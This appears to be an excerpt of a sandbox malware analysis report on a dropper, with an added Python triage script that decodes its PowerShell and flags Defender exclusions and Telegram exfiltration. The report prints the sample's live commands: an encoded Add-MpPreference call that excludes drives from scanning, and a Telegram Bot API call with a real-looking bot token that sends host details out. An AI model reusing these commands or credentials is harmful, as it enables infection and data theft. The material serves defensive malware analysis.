Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
Source: C:\Users\user\Desktop\setup.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagiaeqbxacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagcabgbwacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajahuazqbpacmapgagac0argbvahiaywblacaapaajagmazabmacmapga="
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7879910740:aaempll82moqqk9txwsc5yk5uz56ixr0bzq/sendmessage' -method post -body @{chat_id='6734985705' ; text=' @new device infected!!!, information: date: 2024-12-22 19:05:51, hostname: user-pc, os: win32nt 10.0.19045.0 microsoft windows nt 10.0.19045.0, architecture: 64-bit, public ip: 8.46.123.189'}"
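Added example, not part of the Joe Sandbox report: a small Python triage script that reproduces what the process creation entries above show. It decodes a -EncodedCommand argument (Base64 over UTF-16LE, not UTF-8), strips the <# ... #> block comments the sample interleaves between tokens, and then flags an Add-/Set-MpPreference call with its exclusion paths (the "Powershell Base64 Encoded MpPreference Cmdlet" hit), a Telegram Bot API call with its bot ID, method and chat_id, and an external-IP lookup. The sample command lines are copied from the entries above (the Telegram message text is trimmed); the rule names, the regexes and the list of IP-lookup services are this example's own choices and are not stated anywhere in the report.

```python
"""Triage helper: decode -EncodedCommand PowerShell and flag the behaviours
the process entries above record (Add-MpPreference exclusions, Telegram Bot
API calls, external-IP lookups). Added example, not the report's own code."""
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, ...); match every prefix, longest first.
_ENC_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_FLAG = re.compile(
    rf'-(?:{_ENC_PREFIXES})\s+"?([A-Za-z0-9+/=]{{16,}})"?', re.IGNORECASE)
# <# ... #> block comments between tokens have no effect on execution; the
# sample uses random ones (<#byq#>, <#gnp#>, ...) to defeat plain string matches.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
MP_PREFERENCE = re.compile(
    r"\b((?:Add|Set)-MpPreference)\b(?P<args>.*)", re.IGNORECASE | re.DOTALL)
EXCLUSION_ARG = re.compile(
    r"-Exclusion(?:Path|Process|Extension)\s+@?\(?([^)\s]+)\)?", re.IGNORECASE)
TELEGRAM_BOT = re.compile(
    r"api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)", re.IGNORECASE)
CHAT_ID = re.compile(r"chat_id\s*=\s*['\"]?(\d+)", re.IGNORECASE)
# Assumed list of public "what is my IP" services; only api.ipify.org is in the report.
IP_LOOKUP = re.compile(
    r"\b(api\.ipify\.org|ifconfig\.me|icanhazip\.com|checkip\.amazonaws\.com)\b",
    re.IGNORECASE)

# Constructed test input: command lines copied from the process creation
# entries above (the Telegram message text is trimmed to keep the line short).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="',
    "powershell -Command \"Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!'}\"",
    "powershell -Command \"(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')\"",
    "powershell -Command \"(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')\"",
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if the flag is absent
    or the payload is not valid Base64 of UTF-16LE text (PowerShell's encoding)."""
    m = ENCODED_FLAG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalize(script: str) -> str:
    """Strip <# #> comments and collapse whitespace so cmdlet/argument patterns match."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def analyze_cmdline(cmdline: str) -> List[Dict[str, object]]:
    """Inspect one process command line, decoding -EncodedCommand first."""
    decoded = decode_encoded_command(cmdline)
    script = normalize(decoded if decoded is not None else cmdline)
    findings: List[Dict[str, object]] = []
    m = MP_PREFERENCE.search(script)
    if m:
        values = EXCLUSION_ARG.findall(m.group("args"))
        exclusions = [v.strip("'\"") for value in values for v in value.split(",")]
        findings.append({"rule": "defender_mppreference", "cmdlet": m.group(1),
                         "exclusions": exclusions, "encoded": decoded is not None})
    m = TELEGRAM_BOT.search(script)
    if m:
        chat = CHAT_ID.search(script)
        findings.append({"rule": "telegram_bot_api", "bot_id": m.group(1),
                         "token": m.group(2), "method": m.group(3),
                         "chat_id": chat.group(1) if chat else None})
    m = IP_LOOKUP.search(script)
    if m:
        findings.append({"rule": "external_ip_lookup", "service": m.group(1).lower()})
    return findings


def analyze(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Run analyze_cmdline over a batch (e.g. Sysmon event ID 1 CommandLine values)."""
    return [f for c in cmdlines for f in analyze_cmdline(c)]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_CMDLINES):
        print(finding)
```

Base64 is case-sensitive, so the lowercased copies of the same command lines that the report also lists do not decode; run the script on the original-case entries. The bot ID, token and chat_id it extracts are the operator's credentials and routing for the notification channel: treat them as indicators for blocking and hunting, and note that the message text in the report already shows what is exfiltrated (date, hostname, OS, architecture, public IP).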
Source: setup.exe, 00000000.00000002.1783151107.0000000005C36000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @Winapi@Windows@DOF_PROGMAN
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FF669ABD484 cpuid 3_2_00007FF669ABD484
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF669AC9AE4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\client.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\client.exe | Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FF669AA2C5C CreateEventW,CreateNamedPipeW,3_2_00007FF669AA2C5C
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FF669ACFFF0 GetCurrentProcess,SetUserObjectInformationW,GetCommandLineW,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF669ACFFF0
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FF669AB4224 GetVersionExW,3_2_00007FF669AB4224
Source: C:\ProgramData\svchost\svchost.exe | Code function: 10_2_004058A0 AddClipboardFormatListener,DestroyWindow,GetLastError,DestroyWindow,WaitForSingleObject,PeekMessageA,TranslateMessage,DispatchMessageA,Sleep,RemoveClipboardFormatListener,DestroyWindow,ReleaseMutex,10_2_004058A0
Source: C:\ProgramData\svchost\svchost.exe | Code function: 18_2_004058A0 AddClipboardFormatListener,DestroyWindow,GetLastError,DestroyWindow,WaitForSingleObject,PeekMessageA,TranslateMessage,DispatchMessageA,Sleep,RemoveClipboardFormatListener,DestroyWindow,ReleaseMutex,18_2_004058A0
MITRE ATT&CK matrix (rebuilt from the flattened table: only techniques that carry hit badges are listed, with the badge digits in brackets exactly as shown in the original; tactics whose cells carry no badge are marked "none badged")

Reconnaissance: none badged
Resource Development: Scripting [1]
Initial Access: none badged
Execution: Native API [12]; Command and Scripting Interpreter [12]; PowerShell [1]
Persistence: Scripting [1]; DLL Side-Loading [1]; Registry Run Keys / Startup Folder [121]
Privilege Escalation: Exploitation for Privilege Escalation [1]; DLL Side-Loading [1]; Process Injection [13]; Registry Run Keys / Startup Folder [121]
Defense Evasion: Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]; Masquerading [111]; Virtualization/Sandbox Evasion [251]; Process Injection [13]
Credential Access: none badged
